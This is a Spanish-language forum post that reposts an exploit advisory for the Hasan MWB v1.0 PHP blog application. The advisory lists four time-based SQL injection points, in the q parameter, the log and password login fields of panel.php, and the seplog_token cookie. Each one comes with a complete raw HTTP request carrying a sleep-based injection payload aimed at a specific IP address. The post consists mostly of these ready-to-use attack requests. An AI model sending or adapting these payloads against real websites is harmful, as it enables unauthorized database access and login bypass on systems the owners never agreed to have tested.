Mostrando resultados del 1 al 1 de 1

Tema: [Bug] Hasan MWB v1.0 - Multiple Time-Based SQL Injections [by Socket_0x03]

  1. #1
    Habitual Avatar de Socket_0x03
    Fecha de Ingreso
    mayo-2007
    Ubicación
    Ciberespacio
    Mensajes
    230
    Gracias obtenidos: 73

    Post [Bug] Hasan MWB v1.0 - Multiple Time-Based SQL Injections [by Socket_0x03]

    Código:
    
                 ===================================================
                 Hasan MWB v1.0 - Multiple Time-Based SQL Injections
                 ===================================================
    
    ____________________________________________________________________________________
    
    
     # Exploit Title: Hasan MWB v1.0 - Multiple Time-Based SQL Injections
    
     # Date: [12-04-2018]
    
     # Category: Webapps
    
    ____________________________________________________________________________________
    
    
     # Author: Socket_0x03 (Alvaro J. Gene)
    
     # Email: Socket_0x03 (at) teraexe (dot) com
    
     # Website: www.teraexe.com
    
    ____________________________________________________________________________________
    
    
     # Software Link: https://sourceforge.net/projects/hasanmwb
    
     # Vulnerable Application: Hasan MWB
    
     # Version: 1.0
    
     # Vulnerable File: panel.php
    
     # Parameters: q, log, and password
    
     # Language: This application is available in Indonesian language.
    
     # Product Description: Hasan MWB is an application that a webmaster can use to
       create a blog. In this app, an administrator can use different kinds of features,
       such as a login panel.
       
    ____________________________________________________________________________________
    
    
     #  Multiple Time-Based SQL Injections
    
    -1. Parameter: q
    
    http://www.website.com/?q=%2c(select*from(select(sleep(20)))a)
    
    GET /hasan/?q=%2c(select*from(select(sleep(20)))a) HTTP/1.1
    Host: 75.84.96.178
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://75.84.96.178/hasan/
    Connection: close
    Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2
    Upgrade-Insecure-Requests: 1
    
    -2. File: panel.php Parameter: log
    
    POST /hasan/panel.php HTTP/1.1
    Host: 75.84.96.178
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://75.84.96.178/hasan/panel.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 26
    Connection: close
    Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2
    Upgrade-Insecure-Requests: 1
    
    log='%2b(select*from(select(sleep(20)))a)%2b'&password=&login=Masuk
    
    -3. File: panel.php Parameter: password
    
    POST /hasan/panel.php HTTP/1.1
    Host: 75.84.96.178
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://75.84.96.178/hasan/panel.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 34
    Cookie: seplog_token=obsolete; PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2
    
    password=%2c(select*from(select(sleep(20)))a)&log=&login=login%3dMasuk
    
    -4. File panel.php Cookie: seplog_token
    
    GET /hasan/panel.php HTTP/1.1
    Host: 75.84.96.178
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:63.0) Gecko/20100101 Firefox/63.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: seplog_token=obsolete%2c(select*from(select(sleep(20)))a); PHPSESSID=ekmvdnag3a0vg03l0aocsun5q2
    Upgrade-Insecure-Requests: 1
    
    
    ____________________________________________________________________________________
    
    
     #  More:
    
        https://seclists.org/bugtraq/2018/Dec/6
        https://exploit.kitploit.com/2018/12/hasan-mwb-10-time-based-sql-injection.html?m=1
        https://www.mail-archive.com/bugtraq@securityfocus.com/msg49789.html
    Última edición por Socket_0x03; 06-dic-2018 a las 21:27
    [SOLO LOS USUARIOS REGISTRADOS PUEDEN VER LOS ENLACES. ]

Temas Similares

  1. [Bug] Cory Support v1.0 - Time Based SQLi in signin.php [by Socket_0x03]
    By Socket_0x03 in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 26-nov-2018, 01:37
  2. [Bug] PeepSo v1.11.2 - Time Based SQL Injection [by Socket_0x03]
    By Socket_0x03 in forum Directorio de Exploits
    Respuestas: 0
    Último mensaje: 12-nov-2018, 21:46
  3. Respuestas: 0
    Último mensaje: 30-mar-2009, 21:50
  4. Respuestas: 0
    Último mensaje: 22-mar-2009, 21:26
  5. Respuestas: 0
    Último mensaje: 28-feb-2009, 23:37

Normas de Publicación

  • No puedes crear nuevos temas
  • No puedes responder mensajes
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •